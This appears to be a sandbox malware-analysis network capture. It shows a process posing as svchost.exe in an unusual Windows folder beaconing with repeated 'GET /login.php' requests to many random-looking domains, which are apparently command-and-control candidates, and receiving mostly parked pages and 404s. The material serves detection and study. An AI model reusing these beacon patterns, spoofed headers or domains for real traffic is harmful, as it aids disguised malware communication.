                                                                                                                                                                                                            Data Ascii: 858<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_0FAmRW/Ag0BMutawvMN5/7T4vliKs+oYUVMd+Y55OnVzCkefKmzxOe8RFFzyuxXN6lNGB+yXV2H6NbLg+OVM3w==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115292072 CET1236INData Raw: 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d
                                                                                                                                                                                                            Data Ascii: t source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115305901 CET1236INData Raw: 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f
                                                                                                                                                                                                            Data Ascii: ine-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}butt
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115324020 CET1236INData Raw: 74 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70
                                                                                                                                                                                                            Data Ascii: tton;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.anno
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115335941 CET1236INData Raw: 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72
                                                                                                                                                                                                            Data Ascii: -size:10px}.container-disclaimer__content-text{color:#949494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__conte
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115348101 CET1236INData Raw: 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d
                                                                                                                                                                                                            Data Ascii: rgin-top:10px;margin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transitio
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115354061 CET1236INData Raw: 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 2d 73
                                                                                                                                                                                                            Data Ascii: nd-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115360975 CET1236INData Raw: 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 7d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32 65 3b 66 6f 6e 74 2d
                                                                                                                                                                                                            Data Ascii: rm:translateX(26px);transform:translateX(26px)}body{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:5%;pad
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115366936 CET1236INData Raw: 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 74 72 61 6e 73 66 6f 72 6d
                                                                                                                                                                                                            Data Ascii: ransform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1}.container-content--lp{min-height:720px}.container-content--rp{width:100%;min-height:820px;margin:0}.container-content--twot{min-height:72
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115372896 CET560INData Raw: 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 39 66 64 38 30
                                                                                                                                                                                                            Data Ascii: ne}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#9fd801;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.120240927 CET1236INData Raw: 7b 6d 61 72 67 69 6e 3a 30 7d 2e 64 6f 6d 61 69 6e 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 65 78 74 2d
                                                                                                                                                                                                            Data Ascii: {margin:0}.domain h1{font-size:2.2em;font-weight:normal;text-decoration:none;text-transform:lowercase;color:#949494}#container-domain{display:block;text-align:center} </style><script type="text/javascript"> var dto = {"uiOptimize"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.9 | 56977 | 199.59.243.227 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:49.449634075 CET | 350 | OUT | GET /login.php?subid1=20241112-0407-4879-ab0a-fce34aca034a HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww25.lyxynyx.com
Connection: Keep-Alive
Cookie: __tad=1731344868.1489616
Nov 11, 2024 18:07:49.896653891 CET | 1236 | IN | HTTP/1.1 200 OK
date: Mon, 11 Nov 2024 17:07:49 GMT
content-type: text/html; charset=utf-8
content-length: 1230
x-request-id: 07951af7-1a60-440f-a856-c66b7de487f9
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ICuiegth149RI3KeTCRDtEIIj5zNo9NP2olBsh90l2b86EAQ0Y3d8D3vXFbKUwCoXwuA64pUaBezTAZwkH+7WQ==
set-cookie: parking_session=07951af7-1a60-440f-a856-c66b7de487f9; expires=Mon, 11 Nov 2024 17:22:49 GMT; path=/


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.9 | 49269 | 64.225.91.73 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:50.775305986 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetyhyg.com
Nov 11, 2024 18:07:51.324832916 CET | 816 | IN | HTTP/1.1 200 OK
server: nginx/1.18.0 (Ubuntu)
date: Mon, 11 Nov 2024 17:07:51 GMT
content-type: text/html
content-length: 593
last-modified: Wed, 22 Feb 2023 21:25:52 GMT
etag: "63f68860-251"
accept-ranges: bytes
Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.9 | 49276 | 72.52.179.174 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:51.127825975 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyhub.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.9 | 49277 | 72.52.179.174 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:52.094928980 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyhub.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.9 | 55973 | 52.34.198.229 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:54.230922937 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lygyvuj.com
Nov 11, 2024 18:07:54.944458961 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:07:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=86413af6990054635c36eeef22b5e6c6|66.23.206.109|1731344874|1731344874|0|1|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.9 | 54292 | 44.221.84.105 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:57.856105089 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyhiz.com
Nov 11, 2024 18:07:58.285528898 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:58 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=f6a8643411fffdab52c2830f5397f637|66.23.206.109|1731344878|1731344878|0|1|0; path=/; domain=.gahyhiz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.9 | 54953 | 85.17.31.82 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:59.729769945 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.9 | 54954 | 23.253.46.64 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:59.853358030 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
Nov 11, 2024 18:08:00.308461905 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:54 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:08:00.308474064 CET | 169 | IN
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.9 | 54955 | 199.59.243.227 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:59.896739960 CET | 305 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vojyqem.com
                                                                                                                                                                                                            Cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Nov 11, 2024 18:08:00.322632074 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:07:59 GMT
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            content-length: 1094
                                                                                                                                                                                                            x-request-id: 94950624-c991-4fb7-afb0-803d51a37085
                                                                                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                            set-cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65; expires=Mon, 11 Nov 2024 17:23:00 GMT
                                                                                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
Nov 11, 2024 18:08:00.322647095 CET | 520 | IN
                                                                                                                                                                                                            Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTVhODhlYTAtMzZhNy00ZTRlLThmNjAtNWQxMTM5YjFkZjY1IiwicGFnZV90aW1lIjoxNzMxMzQ0ODgwLCJwYWdlX3VybCI6Imh0dHA6L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.9 | 54956 | 99.83.170.3 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:59.936703920 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
Nov 11, 2024 18:08:00.365859032 CET | 166 | IN | HTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Location: https://puzylyp.com/login.php
                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:00 GMT
                                                                                                                                                                                                            Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.9 | 54962 | 85.17.31.82 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:00.509448051 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.9 | 54963 | 23.253.46.64 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:00.512057066 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
Nov 11, 2024 18:08:00.962601900 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:55 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:08:00.963182926 CET | 169 | IN
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.9 | 55032 | 103.224.212.210 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:09.343974113 CET | 277 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyxynyx.com
                                                                                                                                                                                                            Cookie: __tad=1731344868.1489616
Nov 11, 2024 18:08:09.918761015 CET | 244 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:08:09 GMT
                                                                                                                                                                                                            server: Apache
                                                                                                                                                                                                            location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0408-095b-a6b9-e37a1a5effa6
                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            Data Raw: 0a 0a
                                                                                                                                                                                                            Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.9 | 55033 | 103.224.182.252 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:09.401809931 CET | 277 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vofycot.com
                                                                                                                                                                                                            Cookie: __tad=1731344868.1504633
Nov 11, 2024 18:08:09.967828035 CET | 242 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:08:09 GMT
                                                                                                                                                                                                            server: Apache
                                                                                                                                                                                                            location: http://ww16.vofycot.com/login.php?sub1=20241112-0408-09d4-8f1c-1de8890559b5
                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            Data Raw: 0a 0a
                                                                                                                                                                                                            Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.9 | 55034 | 199.59.243.227 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:09.930073023 CET | 404 | OUT | GET /login.php?subid1=20241112-0408-095b-a6b9-e37a1a5effa6 HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: ww25.lyxynyx.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cookie: __tad=1731344868.1489616; parking_session=07951af7-1a60-440f-a856-c66b7de487f9
Nov 11, 2024 18:08:10.355655909 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:08:09 GMT
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            content-length: 1230
                                                                                                                                                                                                            x-request-id: 9017aeeb-e526-4341-b25a-9667617b2a28
                                                                                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rSdCIc9if8BsoU4czH0lz6K66oDTHXf0N4Pgv1egLP+oQAFI0qCjVyPy+RlX0aLuyPQUcbiWVGvexw5nq5bk7g==
                                                                                                                                                                                                            set-cookie: parking_session=07951af7-1a60-440f-a856-c66b7de487f9; expires=Mon, 11 Nov 2024 17:23:10 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port
42 | 192.168.2.9 | 55035 | 64.190.63.136 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:09.993298054 CET | 348 | OUT | GET /login.php?sub1=20241112-0408-09d4-8f1c-1de8890559b5 HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
